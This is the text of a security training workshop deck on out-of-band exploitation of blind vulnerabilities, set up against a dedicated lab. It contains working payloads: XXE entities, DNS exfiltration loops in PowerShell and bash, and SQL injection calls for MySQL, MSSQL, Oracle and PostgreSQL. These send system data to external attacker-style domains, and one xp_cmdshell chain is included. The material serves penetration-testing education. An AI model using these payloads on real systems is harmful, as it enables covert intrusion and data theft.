Out-of-Band Exploitation for Asynchronous Vulnerabilities · Ashwin Pathak • Senior Security Consultant @NotSoSecure • Certification : OSCP • 6.5 Years of experience • Expertise

Out-of-Band Exploitation for Asynchronous Vulnerabilities

SSID: OOB1 or OOB2

Password: Out0fB@nd2020

About NotSoSecure

• Web Application Security Assessment

• Infrastructure Security Assessment

• Mobile Application Security Assessment

• Source Code Review

• IoT Security Assessment

• Red Team Exercises

● Beginner Friendly○ Hacking 101○ Basic Infrastructure Hacking○ Basic Web Hacking

● Advanced/Specialist Offensive Courses○ Advanced Infrastructure Hacking○ Advanced Web Hacking○ Hacking and Securing Cloud

● Specialist Defensive Courses○ Application Security for Developers○ DevSecOps

Training

For private/corporate training please contact us at training@notsosecure.com

Penetration Testing

IT security specialist company providing cutting-edge IT security consultancy and training.

Speakers

Ajay Prashar

• Senior Security Consultant @ NotSoSecure

• 4+ Years of experience

• Research published in Top Ten Hacking Techniques of 2018 by

Portswigger and Exploit Database (@ExploitDB)

• Researcher and vulnerable app developer @Notsosecure.

• Connect : @tricksiused

Speakers

Ashwin Pathak

• Senior Security Consultant @NotSoSecure

• Certification : OSCP

• 6.5 Years of experience

• Expertise in Web/Cloud/Network.

• Researcher and vulnerable app developer @Notsosecure.

• Passionate about make and break.

• Connect @AshwinPathak26

What will we be Looking at ?

• Introduction to Out-of-Band (OOB)

• Tools for the Trade

• Understanding DNS and its Limitation

• XML External Entity (XXE) Attack

• Command Injection

• SQL Injection

• Final Challenge

Lab Setup

● Please visit the google doc link below and follow the instructions.

○ http://bit.ly/NSS-OOB

○ http://null.oob.lab/setup.pdf

● Targets:

○ https://null.oob.lab

○ https://null.oob.lab:3001

SSID: OOB1 or OOB2

Password: Out0fB@nd2020

10.1.2.100

Any abuse of network privileges beyond the stated aims will result in

immediate disqualification from the workshop. Actions that may result

in disqualification are:

○ Any activity causing a Denial of service (DoS)

○ System shutdown

○ Interference in other delegates’ work etc.

Delegate agreement

How?OOB

Introduction

• Exploitation/Detection channels are different.

• A blind vulnerability is the one in which an attacker doesn't get any

output to the malicious activities performed by them.

• Time Based attack are time consuming.

• Out of Band are quick and stealthy.

Tools for the Trade

• Netcat

• Tcpdump

• Web Servers (Python SimpleHTTP)

• FTP Servers

• Wireshark

Netcat

• Netcat is a computer networking tool or utility for reading from and

writing to network connections using TCP or UDP.

• It has the ability to make various kinds of connections, it is a easy-

to-use and efficient network debugging and exploration tool.

• Netcat can work like a client as well as a server.

Tcpdump/Windump

• Command-line packet analyzer.

• Capture & display TCP/UDP/IP packets.

• It can read packets from a network interface card or from a

previously created saved packet file and can also write packets to

standard output or a file

• We will use for Monitoring DNS traffic in our Lab

Python SimpleHTTPServer

• A simple python server.

• A web server that enables GET and POST requests.

• Can be efficiently used for OOB request over http protocol.

Protocols to Leverage OOB Calls

TCP is a connection-oriented protocol, which

means a connection is established and

maintained until the application programs at

each end have finished exchanging

messages

● HTTP

● FTP

● SMB .etc.

UDP (User Datagram Protocol) is an

alternative communications protocol to

TCP used primarily for establishing low-

latency and loss-tolerating connections

between applications on the internet.

● DNS

ICMP is used by routers, intermediary

devices or hosts to communicate error

information or updates to other routers,

intermediary devices or hosts.

● PING Utility

Reference: https://searchnetworking.techtarget.com

Why DNS for OOB ?

• Egress Hardened Firewalls block default protocols like http, ftp etc.

• Difficult to validate a blind injection in presence of such protections.

• Any communication generally starts with a DNS resolution, from a

FQDN, So it is required everywhere and is less monitored.

• Hard for corporation to function if rules are put on DNS.

• Good channel for data exfiltration as companies tend to go easy on

DNS communication.

DNS Limitations

● A domain name can have maximum of 127 subdomains.

● Each subdomains can have maximum of 63 character length.

● Maximum length of full domain name is 253 characters.

● Due to DNS records caching, unique values are required in domain names

for each request.

● DNS being plaintext channel, any data extracted over DNS will be in

cleartext format and will be available to intermediary nodes and DNS Server

caches. Hence, it is recommended not to exfiltrate sensitive data over DNS.

XML External Entity (XXE) Basics

• XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, leading to sensitive data exposure, situation of DoS, Server-side Request Forgery (SSRF), port scanning etc.

• Blind, in certain cases the XML external entities are being processed on the server-side, yet they don’t reveal any information in the response to confirm the execution of XXE.

Blind XXE Detection

• For OOB detection an attacker can craft payloads which can generate requests for external entity.

• Before any communication starts to fetch external entity, DNS resolution will take place.

• Sample Protocols/Payload• HTTP : <!ENTITY test SYSTEM 'ldap://oob.dnsattacker.com:port'>

• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>

• Gopher: <!ENTITY test SYSTEM 'gopher://oob.dnsattacker.com:port/%data%'>

Exercise - XXE : DNS for Detection

• Identify the XML External Entity vulnerability by making the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab

XXE Exploitation over HTTP Channel

• For OOB exploitation on HTTP channel, an attacker can craft

payloads which contain requests for externally hosted Document

Type Declaration (DTD), which can be used for exploiting this

vulnerability.

• What is DTD?

• It defines the valid building blocks of an XML document

• It defines the structure of a document using a list of validated

elements and attributes

• A DTD can be declared in various ways - inline inside an XML

document, or as an external reference

DEMO- XXE : HTTP for Exploitation [Windows/Linux]

• Exploit the XML External Entity vulnerability to make the host send HTTP requests to an external web server containing contents of ‘/etc/passwd’ file.

XXE Exploitation over HTTP+FTP Channel

• HTTP breaks for

• an invalid character, such as #

• or when the URL length is exceeded.

• How this works?

• Vulnerable XML app loads external malicious DTD schema via

HTTP request to a webserver, performs operation and makes an

external entity request via FTP from ftp://host:port/%data;

Exercise - XXE : FTP for Exfiltration

• Exploit the XML External Entity vulnerability to extract contents of ‘C:/Windows/win.ini’ file using combination of HTTP and FTP.

Reference https://github.com/staaldraad/xxeserv

Stealing Hashes?

• SMB protocol : shared access to files, printers, and serial ports between nodes on a network

• SMB in XXE:• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>

CVE 2018-0878

• Microsoft Windows Remote Assistance -

XML External Entity Injection:

https://krbtgt.pw/windows-remote-

assistance-xxe-vulnerability

• An information disclosure vulnerability

exists when Windows Remote Assistance

incorrectly processes XML External Entities

(XXE).

Command/Code Injection

• Execution of arbitrary commands or code on the host system.

• Blind Injection ?• Blind vulnerabilities do not return the output from the command within its

HTTP response.

• How to detect?• Injected command can be used to create an out-of-band network

interaction with a system controlled by us.

Example: An attacker can craft payloads which can generate DNS queries via Command Injection.

• Sample Payload• nslookup test.oob.dnsattacker.com or dig test.oob.dnsattacker.com

Exercise - DNS for Exploitation

• Extract the output for the command ‘hostname’ over DNS Queries.

Challenge URL: http://null.oob.lab:3006

For Large Outputs and Files

1.Encoding

Encode the command

output so that it can be

transferred over DNS

channel without breaking

the DNS queries syntax.

(Data handling)

2.Dividing

Breaking the output to

relevant subdomain

sizes suitable for DNS

queries.

3.Sending

Sending divided output

on DNS channel by

performing DNS queries.

4.Reconstructing

Reconstructing the

output by collecting,

rearranging and

decoding DNS queries.

Exercise - DNS for exploitation

• Extract the output for the command ‘ver’ over DNS Queries.

• Windows• Challenge URL: http://null.oob.lab:3006

The Magic Payload

cmd /v /c "ver > output && certutil -encodehex -f output output.hex 4 &&

powershell $text=Get-Content output.hex;$subdomain=$text.replace('

','');$j=11111;foreach($i in $subdomain){

$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final

• Dissecting the command• ver > output && certutil -encodehex -f output output.hex 4

• powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');

• $j=11111;foreach($i in $subdomain){

$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }

• cmd /v /c

• Linux Version• var=11111 && for i in $(ifconfig|base64|awk '{gsub(/.{50}/,"&\n")}1'); do

var=$((var+1)) && nslookup $var.$i.file.oob.dnsattacker.com; done#

Exploitation over other channels

● Command output can also be appended to the HTTP requests○ In HTTP Request Headers, Query Parameters etc.

● Some Native utilities to create web request:○ Windows: Powershell, Mshta, Certutil.exe

○ Linux: wget, curl

● Command Output via ICMP channel (Ping)

• SQLi vulnerabilities arise when user supplied data becomes part of SQL queries in an unsafe manner.

• In certain cases the applications even though vulnerable to SQL injection don’t reveal much information in the application response.

• In such cases inbuilt SQL functions can be used to confirm and then exploit the vulnerability.

SQL Injection

MariaDB(MySQL)

Some of the functions to produce out-of-band calls are as follows:● OUTFILE

○ SELECT 'a' INTO OUTFILE '\\\\aaaa.null.oob.lab\\foo$';

● LOAD_FILE

○ SELECT LOAD_FILE(CONCAT('\\\\', (SELECT

HEX(CONCAT(user(),"\n"))), '.null.oob.lab\\test.txt'));

Exercise - DNS for (MariaDB)MYSQL

• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.

In MSSQL an attacker can use following functions to create Out-of-Band calls:

• BULK INSERT

BULK INSERT employees FROM "\\aaa.ashwin.sos.notsosecure.com\foo$";

• xp_dirtree

DECLARE @data varchar(1024); SELECT @data = (SELECT system_user); EXEC('master..xp_dirtree"\\'+@data+'.ashwin.sos.notsosecure.com\foo$"');

Demo - : DNS for MSSQL

Misconfigured Oracle

Some methods to create DNS queries are :• UTL_HTTP

SELECT utl_http.request('http://aaa.ashwin.sos.notsosecure.com/') FROM

• DBMS_LDAP

SELECT DBMS_LDAP.INIT((SELECT version FROM

v$instance)||'.attacker.com',80) FROM dual;

• XXE in Oracle 11g

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-

8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM

"http://cccc.ashwin.sos.notsosecure.com/test"> %remote; >'),'/l') from dual

Exercise - DNS for Oracle

PostgreSQL

In case of Postgresql, the following functions can be used to create Out-of-band calls:

• dblink_connect

CREATE EXTENSION dblink; SELECT dblink_connect('host=c444444.ashwin.sos.notsosecure.com user=postgres password=password dbname=pg_sitepoint');

Demo - : DNS for PostgreSQL

Tips for Final Challenge

• You can use the command injection payload used earlier with some more additional changes to make it suitable for SQL injection.

Final Challenge : Exfiltrate Large command Output via DNS

• Use the SQL Injection vulnerability to exfiltrate command output of ‘ipconfig/ifconfig’ to an external host using DNS queries.

'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > output && certutil -encodehex -f output

output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace('

$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }" ‘ --

Sample Command : https://www.notsosecure.com/oob-exploitation-cheatsheet/

egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' file.txt|sort -u|cut -d. -f2|xxd -r -p

• Dissecting the command• ipconfig > output && certutil -encodehex -f output output.hex 4

• powershell $text=Get-Content output.hex;$subdomain=$text.replace('

$final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }

• Encoding the above command to powershell specific base64 ()

• cmd /v /c

Burp Suite Collaborator

● A network service which helps to discover Blind vulnerabilities such as SQL Injection, XXE Attack, Cross-Site Scripting etc.

● Uses a specially crafted dedicated domain name and reports as an issue such as External Service Interaction, SQL Injection etc.

Reference : https://portswigger.net/burp/documentation/collaborator

• Web Alternative: swin.es/o

Making Sockets Public

• NGROK• CLOUD VM instances:• SSH port forwarding• Dynamic-dns and Port forwarding

Case Studies

NotSoSecure:

• Blind RCE due to Java Deserialization vulnerability.• Path Traversal to Blind Remote Code Execution using Blacklist3r and

YSoSerial.NET

Key Workshop Takeaways

• There are multiple ways and techniques a user can write/form the

payload/setup for OOB.

• Why DNS can be your go to technique?

• Tools and techniques for basic to advanced setup.

Thank You

END PRESENTATION

Out-of-Band Exploitation for Asynchronous Vulnerabilities · Ashwin Pathak • Senior Security Consultant @NotSoSecure • Certification : OSCP • 6.5 Years of experience • Expertise

Documents

Pankhuri Pathak

Ashwin Balaji's Portfolio

ONTARIO SHARPS COLLECTION PROGRAM PLAN...

ARTICLE - Ashwin Gopinath

Ashwin Ushas Corp

Abhijit Pathak

Pathak Thesis

Quizzing with Ashwin

Ashwin Corporate

My pwk & oscp journey

OPEN CHARGE · OSCP • Development of the OSCP protocol...

Analisis Sensitivitas Lingkungan Oscp Delta Mahakam

Preparing for the OSCP - OWASP · Penetration Testing with....

Offensive Security Certified Professional (OSCP) ·...

ASHWIN COELHO

Ashwin Ppt Notes